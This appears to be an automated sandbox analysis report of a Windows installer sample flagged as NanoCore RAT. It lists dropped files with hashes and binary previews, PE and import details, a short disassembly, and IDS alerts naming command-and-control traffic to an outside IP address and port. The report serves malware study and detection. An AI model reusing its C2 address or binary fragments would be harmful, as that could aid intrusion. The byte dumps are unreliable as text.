                                                                                      SSDEEP:3072:HzS560/yk/J3HssPqqGLgl+zX3FKZzSzvG7mH28dZOjc/2r6MqRo9HYzsQb5878:HqJ3HssPqqGLgl+zXkZzt84a84
                                                                                      MD5:DA9015DF320DCC2EDDEE493E20F639BA
                                                                                      SHA1:5732E5722D2CB5A668ABC19AED6434852D0A4FC8
                                                                                      SHA-256:2294EBB89E749E7145628164913251B563EA6641A6CD1AE03FBCE55DA43F9B17
                                                                                      SHA-512:AF2C0E28966537842817174146DEDEA93A00BDBACF97FFAAECE878E3191D3719BF9A2B1618AB645CB68D2039B4EB16524B309A2BF0D76DDCA6AE09708CD2CBFA
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.8825.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.8825.exe, Detection: malicious, Browse
                                                                                      • Filename: evilmsi.msi, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.\.........." ..0......".......... .........a. ....................................`.................................r...O........................_.......................................................... ............... ..H............text....... ...................... ..`.rsrc............ ..................@..@.reloc..............................@..B........................H.......8...0...........h...x............................................((...*.0..-.......~P...- r...p.....()...o*...s+......P...~P...*.~Q...*...Q...*V(....r'..p~Q...o,...*V(....re..p~Q...o,...*V(....r...p~Q...o,...*V(....r...p~Q...o,...*V(....rA..p~Q...o,...*V(....r...p~Q...o,...*V(....r...p~Q...o,...*V(....r%..p~Q...o,...*V(....re..p~Q...o,...*V(....r...p~Q...o,...*V(....r...p~Q...o,...*V(....r!..p~Q...o,...*V(....rW..p~Q...o,...*V(....r...p~Q...o,...*V(....r...p~Q...o,..
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):311390
                                                                                      Entropy (8bit):6.361387975641255
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:U/Vk7bUkU6FA8p/eE7Zfjaehfp49MQJZMCJkp5kUKFhRY2:wV8qgZfhhfp49MQJZMCJC5YFZ
                                                                                      MD5:96CF937BBA21CB4D3203E15246837AE9
                                                                                      SHA1:08B9BF57F8942CA98077B62BB0DBA0BD0AF2C952
                                                                                      SHA-256:398185CE130D689D5D2B2C3F179F540715F030D91246C876675E84456F1BA488
                                                                                      SHA-512:C9E3B60B266ED39B85E87B083EED132441FB364D443AC60F5C4A1BC7B59595FE97387B00BA6817265DC7BF30F3FFAA4F3DF1385327F85C083B51F91CA169D282
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q.Z.0...0...0.......0...,...0.../...0..(,...0.../...0.../...0...0...1..Q....0.......0..l6...0.......0..T....0..Rich.0..........PE..L....}.I...........!................G........ ......................................................................p....:..X...@....p...........................3..0%............................................... ..(............................text............................... ..`.rdata..`.... ....... ..............@..@.data....i.......p..................@....rsrc........p.......p..............@..@.reloc...:.......@..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):725
                                                                                      Entropy (8bit):7.612179564723704
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:6v/7skki3PkFefEst0cNLbh4rbRiUq4reba3XECLR9ZFahsWujm9dcKjnpdwlkc:VkkMPkxc04Lbh4rViH4rEalLHnWVujuS
                                                                                      MD5:5CE69BDF1125A922B6ED1FE28DCAF92B
                                                                                      SHA1:10C925FAD32D7071A3D96608FD1A04ECDA1B4820
                                                                                      SHA-256:0537CF9335394EA509ED23021DAA44F781D380FEAA3947B9DD31C290BE706E1A
                                                                                      SHA-512:E4F76572FE9613BA184E7988533BC434B61FDD0544C148DFB53EB7691590232A2930515B70F61B9696980EE6FA01202C861BEB9A1AEE859C3ECCDD795BBA75E8
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR................a....IDATx....t.`...p....Em.k.m.8.m.m.7.9.m4..K..$bbb.}..T9.....k.........Mu......]...-(...8o8.B.^.B....4r..e...6.c.....B=......P]`D....A.*W.]s....g.!...z..?<w...o..\%..r...a.)..X.N.y...u.h..!...r.._.R..}.v.{..).l._.A.j~.ZE?d......L.(.ZmL................3....P....,..(.3.,D..]K....9Y..1c..K..i....w...s.......K.._5 M..1r...].'.|..5v__..#....X8w..`.u=..+.......K.!Y9..<EN.m./....r......,....#F...........]......{...2..A.)Y..W.. r.v.o..]..['.V......I3T.U........A.=.T.\......X."..P...\..Y?..4.P(..i..y...;..oP@.i..l.<.O...%KZ......-w...<<<...|_..=...?..OI{r!...Z...k..|.....].v..V..no.[....j..z..N...n.%Opip3.88..9...L.....(UG.h:u....[..u ...^............IEND.B`.
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):207
                                                                                      Entropy (8bit):6.561784186830513
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:yionv//thPl9vt3lAnsrtxBllJF5peNf2J+Ej+hdc45kjv/iW8DFWwd5sXGQ4Hh9:6v/lhPysPwXx5kjSW8DF3dyTKhAq7p
                                                                                      MD5:EBBCB008023C6C1B4EFAB0774A4BB19E
                                                                                      SHA1:7C657C976D7D728E9D6D8F6A603F50B42D86C321
                                                                                      SHA-256:5FD17A236AF8B520DB2E34E44E71C3634CB8221E0A27617E522ECB8D0FF8EFF8
                                                                                      SHA-512:DCEDCF09A83F2350D42001CFD009B395F8CA7B9B33F4B7CC3C1C787EDCE9749030EB54AC8D90645F92C141C8D882A4F0AB9A32F274320DE260CD3DF37CED71CE
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8..S1..0.<..._..>..q3&n..X(.&F.!!@.....8.....b.W...r.`*t.|....a4l....&..|.B...6.F..'Yk$....e_a.y..I...8.D..~..=.9...eE/....5.x.B.B.O."J....IEND.B`.
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):255
                                                                                      Entropy (8bit):6.804661221546568
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:6v/lhPEkME03pQi22U1mw7vgdLSPhZjp7YlHgX+nSbw/Vp:6v/7CE03p829ovCAYlNnScz
                                                                                      MD5:0D948AEE5693D469DA3F0DCC0FCC009D
                                                                                      SHA1:61A9DA78E129B3A98855E54F837025CA20DF8017
                                                                                      SHA-256:85D3314527708E953C393ABE52AD6A7AD63BDA7A31353CE0380CC775AA781A6F
                                                                                      SHA-512:C7E601DF3F09BCF1D144F35CF9402E00CCDE7C3CB705D5EC39787F526158DE4110CEE10965DDCBD64BC65B3DC97CD8E504BBFEF20ACF045D0851441C691CE605
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR................a....IDATx..C.CQ..{.me.;.....6..a.;..A...x_..*....9\......o...8.>.Y..I.I....m!..BJ...C.u.(.H.H.W...U?...w.N....)AP(da...;.8k....7.}.a.j.....C.d.`0i{.r..b1Gz..w2 .IBH<.T`..;....x .e`.O{.W..7...W..O?.c$+..8.......IEND.B`.
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):274
                                                                                      Entropy (8bit):6.700098934002617
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:6v/lhPysPQcxtmxnHmYR3o5dEYBgQin+ErxwfHDYnIp:6v/7lxUhH/N9YB/inDwfHwi
                                                                                      MD5:D8FFE7BA5669DE024607E64126DDFFEC
                                                                                      SHA1:D1993BB12041E4C3F7CF45AFB2DBCFB74A544C0D
                                                                                      SHA-256:2A6FD48DE810DE4BD61BD26DDAECCB6C6C9204CB4D213EBE1ACB560054911CDD
                                                                                      SHA-512:47C6D898DE3DFC27E63563F7723F8F690156FBF0F45470FF0DD2FE4E75D4B7108D9700E34E14890DB95C9D20A9D77D7429B32044B2E58708984A4014D35760BD
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8......0.E_.%.P&#.d.6.....3..A....B.".-t."vd.c..}.d...g...b.B4.k.......l..W'..Q"F.K.;.ez.+D...D..S...h.1b.."..w.E..T`u@..c.s..#+..<..|....b.Q.8^.9P.u...s.... T...W.A........2.V..P........{../......$.......IEND.B`.
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):12288
                                                                                      Entropy (8bit):5.814115788739565
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                      MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                      SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                      SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                      SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):107216
                                                                                      Entropy (8bit):6.554876906345404
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:bd1dHfDjsv8AvQakQv7rJa3Y/Y7CDxTNHDfL59RmhworviqH:blrjQ8AvdkQTrk31SNLLjOvd
                                                                                      MD5:ED3D19D00DB707AB5E556BE6E3F7E7ED
                                                                                      SHA1:89B973BF2F6961DD736FA420E6506BCB665103E0
                                                                                      SHA-256:F1DCEA81AFBB3752B920E586A7C19927BB6D3C9051D133B863D5B5801E4098CD
                                                                                      SHA-512:498728E4F42907F1677C5FB1A8CB6681941E32F4925BAEA1E3D054B61CCCEB1A435E93FC4E81D27C743AE4F443E63CA227434171012523300314E8A08A0E16B0
                                                                                      Malicious:false
                                                                                      Preview:.....t... ...................................f.s...~.....r.....=\%.i...............................................................b.f......f....,.O.g.........................................f.q.;.........!..Z................................a....a.f.k.........7t..........................I..............,.....................................................f.s.......}Qk............................f........f.......f..............................f.h...f.b..'Gi.P ...............7..........................................................H...............>...j..........................................................f......f.k........v..@.yy&.........................................................................0.}.ebbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbf............f.`..%LP........................................f..............Be'||||||||||||||||||||||||||||||||||||||||||!...f.s..f.q....wf.r...=...........................................
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2250
                                                                                      Entropy (8bit):5.060293593237505
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:uTHxDxX7Nrh4sRIjan3/CpUlOpUjWQ05+N2iNM0zjjf47GvSzRU:gxDl7Nl4sDvvOK0/mMu4C5
                                                                                      MD5:4BCE488F7C4E00ED71170C7D0A593663
                                                                                      SHA1:F49F1FD072D650A8A5DD1F026E003CEE85420BC8
                                                                                      SHA-256:17365C633230CD05375125AA6C710B76900E2B93D87D14E1F9F2338C3B3BEA1A
                                                                                      SHA-512:E570D618B14A39F319DC12F0332BA62E8387C5A9F8104AEC7263F89B806CA7E501DD9762B8B117B34E5F8E401564C015FF269BC432776327C7768C3B67087F7E
                                                                                      Malicious:false
                                                                                      Preview:..;-------------------------------------------------------------------------..; vmmemctl.inf..;..; Copyright (c) 1993-1999, Microsoft Corporation..; Copyright (c) 1999-2019 VMware, Inc. All rights reserved...;-------------------------------------------------------------------------..............................................[version]..Signature="$Windows NT$"..Class = System..ClassGUID = {4d36e97d-e325-11ce-bfc1-08002be10318}..Provider = %VMwareProvider%..DriverVer = 08/12/2019, 7.5.5.0..CatalogFile = vmmemctl.cat..DriverPackageDisplayName = %loc.VMMemCtlServiceDisplayName%..DriverPackageType = KernelService....[DestinationDirs]..DefaultDestDir = 12....[SourceDisksNames]..1 = %loc.Disk1%,,,""....[SourceDisksFiles]..vmmemctl.sys = 1....;;..;; Default install sections..;;....[DefaultInstall]..OptionDesc = %loc.VMMemCtlServiceDesc%..CopyFiles = VMMemCtl.DriverFiles....[DefaultInstall.Services]..AddService = %VMMemCtlServiceName%,0x800,VMMemCtl.S
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):232
                                                                                      Entropy (8bit):7.024371743172393
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                                                                                      MD5:32D0AAE13696FF7F8AF33B2D22451028
                                                                                      SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                                                                                      SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                                                                                      SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                                                                                      Malicious:false
                                                                                      Preview:Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8
                                                                                      Entropy (8bit):3.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:fNq6/t:lLt
                                                                                      MD5:3B89B23126F55AC55335BA2592A839F3
                                                                                      SHA1:1AC9F178A64BE3EC15C92311F4C848FE443BE9D9
                                                                                      SHA-256:F029142EE59B634D80AEC8B1B646A1BCB027BA3C16933DBE6B6F199BB621B76F
                                                                                      SHA-512:C876C041350B281FDD63583AF458D9E56116D7D5C43E4477E9231254B44429760EFC2FBBE828B1A26DC618673719285C313803BA9FABCED0F15F30E2A1166134
                                                                                      Malicious:true
                                                                                      Preview:.k.b?.H
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                      Entropy (8bit):7.7033108137307496
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File size:1000520
                                                                                      MD5:be43b751bd103fe5a64b4e0aa7a30060
                                                                                      SHA1:ab293504fe7636c3cfc74718973bbd1cbca05fb4
                                                                                      SHA256:87eefb05fd8c133f8a0059e1bc695f652a2f7b0c297386d7a08fb37bdb76009b
                                                                                      SHA512:825db1705fec16ef84402001ebbfbb47a8cdd70e694a65d195e2ea40c5622619fcb51132e7865de8118b81b3c1dee0aafc1cc560fd5a964bde2b8adf7ce430ff
                                                                                      SSDEEP:24576:Vbgt9IUnghMeF3HVojgCpaxMiicfJuAJH:9gNngXXujhpaCih
                                                                                      TLSH:192522053F5CDD22C0A40CBAA9F3C64D6AB9EE00465D5A433751393EFEFE662690E11B
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........
                                                                                      Icon Hash:34d2c6c3c7c6bc58
                                                                                      Entrypoint:0x40352d
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:true
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                      Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                                                                      Signature Valid:false
                                                                                      Signature Issuer:CN="rinkendes Experiments ", O=Barskest, L=Mather, S=Wisconsin, C=US
                                                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                      Error Number:-2146762487
                                                                                      Not Before, Not After
                                                                                      • 26/05/2022 17:42:13 26/05/2023 17:42:13
                                                                                      Subject Chain
                                                                                      • CN="rinkendes Experiments ", O=Barskest, L=Mather, S=Wisconsin, C=US
                                                                                      Version:3
                                                                                      Thumbprint MD5:A7557C0E83650866B28AB2077645E0DE
                                                                                      Thumbprint SHA-1:3BEA5C0A3865D2AB708E44BE6A0BDC5DB60306B3
                                                                                      Thumbprint SHA-256:76B82D02656D7F6C305B3EAF4E61B6F551A23414E029C0801619EBE13A7B452C
                                                                                      Serial:04D1E786DF1E3E77
                                                                                      Instruction
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 000003F4h
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      push 00000020h
                                                                                      pop edi
                                                                                      xor ebx, ebx
                                                                                      push 00008001h
                                                                                      mov dword ptr [ebp-14h], ebx
                                                                                      mov dword ptr [ebp-04h], 0040A2E0h
                                                                                      mov dword ptr [ebp-10h], ebx
                                                                                      call dword ptr [004080CCh]
                                                                                      mov esi, dword ptr [004080D0h]
                                                                                      lea eax, dword ptr [ebp-00000140h]
                                                                                      push eax
                                                                                      mov dword ptr [ebp-0000012Ch], ebx
                                                                                      mov dword ptr [ebp-2Ch], ebx
                                                                                      mov dword ptr [ebp-28h], ebx
                                                                                      mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                      call esi
                                                                                      test eax, eax
                                                                                      jne 00007F69F0A369DAh
                                                                                      lea eax, dword ptr [ebp-00000140h]
                                                                                      mov dword ptr [ebp-00000140h], 00000114h
                                                                                      push eax
                                                                                      call esi
                                                                                      mov ax, word ptr [ebp-0000012Ch]
                                                                                      mov ecx, dword ptr [ebp-00000112h]
                                                                                      sub ax, 00000053h
                                                                                      add ecx, FFFFFFD0h
                                                                                      neg ax
                                                                                      sbb eax, eax
                                                                                      mov byte ptr [ebp-26h], 00000004h
                                                                                      not eax
                                                                                      and eax, ecx
                                                                                      mov word ptr [ebp-2Ch], ax
                                                                                      cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                      jnc 00007F69F0A369AAh
                                                                                      and word ptr [ebp-00000132h], 0000h
                                                                                      mov eax, dword ptr [ebp-00000134h]
                                                                                      movzx ecx, byte ptr [ebp-00000138h]
                                                                                      mov dword ptr [00434FB8h], eax
                                                                                      xor eax, eax
                                                                                      mov ah, byte ptr [ebp-0000013Ch]
                                                                                      movzx eax, ax
                                                                                      or eax, ecx
                                                                                      xor ecx, ecx
                                                                                      mov ch, byte ptr [ebp-2Ch]
                                                                                      movzx ecx, cx
                                                                                      shl eax, 10h
                                                                                      or eax, ecx
                                                                                      Programming Language:
                                                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x3a278.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xf2c500x17f8
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                      .ndata0x360000x2a0000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x600000x3a2780x3a400False0.578342945279data6.13676898317IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountry
                                                                                      RT_ICON0x603880x11db7PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                      RT_ICON0x721400x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                      RT_ICON0x829680x94a8dataEnglishUnited States
                                                                                      RT_ICON0x8be100x5488dataEnglishUnited States
                                                                                      RT_ICON0x912980x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 234938623, next used block 4294909696EnglishUnited States
                                                                                      RT_ICON0x954c00x25a8dataEnglishUnited States
                                                                                      RT_ICON0x97a680x10a8dataEnglishUnited States
                                                                                      RT_ICON0x98b100x988dataEnglishUnited States
                                                                                      RT_ICON0x994980x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                      RT_DIALOG0x999000x100dataEnglishUnited States
                                                                                      RT_DIALOG0x99a000x11cdataEnglishUnited States
                                                                                      RT_DIALOG0x99b200xc4dataEnglishUnited States
                                                                                      RT_DIALOG0x99be80x60dataEnglishUnited States
                                                                                      RT_GROUP_ICON0x99c480x84dataEnglishUnited States
                                                                                      RT_VERSION0x99cd00x264dataEnglishUnited States
                                                                                      RT_MANIFEST0x99f380x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                                                                      DLLImport
                                                                                      ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                      SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                      USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                                                      DescriptionData
                                                                                      LegalCopyrightunawarelymed
                                                                                      FileVersion8.3.15
                                                                                      CompanyNameuvanligereomk
                                                                                      LegalTrademarksINSTRUKTIONS
                                                                                      CommentsNONSTIC
                                                                                      ProductNameAnti60
                                                                                      FileDescriptionMeousgavebo
                                                                                      Translation0x0409 0x04b0
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States
                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      192.168.11.2023.105.131.2284981552182816766 05/26/22-22:59:36.110765TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498155218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984852182816766 05/26/22-23:02:46.099381TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498485218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982552182816766 05/26/22-23:00:31.508103TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498255218192.168.11.2023.105.131.228
